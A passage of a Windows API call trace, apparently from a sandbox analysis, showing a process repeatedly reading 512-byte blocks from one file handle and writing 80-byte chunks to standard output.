lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] GetFileType (hFile=0x50) returned 0x1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] GetFileType (hFile=0x50) returned 0x1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] GetFileType (hFile=0x50) returned 0x1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] GetFileType (hFile=0x50) returned 0x1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] GetFileType (hFile=0x50) returned 0x1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.530] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.530] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.530] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.530] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] GetFileType (hFile=0x50) returned 0x1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] GetFileType (hFile=0x50) returned 0x1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] GetFileType (hFile=0x50) returned 0x1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] GetFileType (hFile=0x50) returned 0x1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] GetFileType (hFile=0x50) returned 0x1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] GetFileType (hFile=0x50) returned 0x1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] GetFileType (hFile=0x50) returned 0x1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] GetFileType (hFile=0x50) returned 0x1 [0152.532] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.532] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.532] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.532] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.532] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.532] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.532] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.532] GetFileType (hFile=0x50) returned 0x1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] GetFileType (hFile=0x50) returned 0x1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] GetFileType (hFile=0x50) returned 0x1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] GetFileType (hFile=0x50) returned 0x1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] GetFileType (hFile=0x50) returned 0x1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] GetFileType (hFile=0x50) returned 0x1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] GetFileType (hFile=0x50) returned 0x1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] GetFileType (hFile=0x50) returned 0x1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.534] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.534] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] GetFileType (hFile=0x50) returned 0x1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] GetFileType (hFile=0x50) returned 0x1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] GetFileType (hFile=0x50) returned 0x1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] GetFileType (hFile=0x50) returned 0x1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] GetFileType (hFile=0x50) returned 0x1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] GetFileType (hFile=0x50) returned 0x1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] GetFileType (hFile=0x50) returned 0x1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] GetFileType (hFile=0x50) returned 0x1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.535] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.535] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] GetFileType (hFile=0x50) returned 0x1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.537] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.537] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.537] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.537] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] GetFileType (hFile=0x50) returned 0x1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] GetFileType (hFile=0x50) returned 0x1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] GetFileType (hFile=0x50) returned 0x1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] GetFileType (hFile=0x50) returned 0x1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] GetFileType (hFile=0x50) returned 0x1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] GetFileType (hFile=0x50) returned 0x1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] GetFileType (hFile=0x50) returned 0x1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] GetFileType (hFile=0x50) returned 0x1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.538] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.538] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] GetFileType (hFile=0x50) returned 0x1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] GetFileType (hFile=0x50) returned 0x1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] GetFileType (hFile=0x50) returned 0x1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] GetFileType (hFile=0x50) returned 0x1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] GetFileType (hFile=0x50) returned 0x1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] GetFileType (hFile=0x50) returned 0x1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] GetFileType (hFile=0x50) returned 0x1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] GetFileType (hFile=0x50) returned 0x1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.540] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.540] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] GetFileType (hFile=0x50) returned 0x1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] GetFileType (hFile=0x50) returned 0x1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] GetFileType (hFile=0x50) returned 0x1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] GetFileType (hFile=0x50) returned 0x1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] GetFileType (hFile=0x50) returned 0x1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] GetFileType (hFile=0x50) returned 0x1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 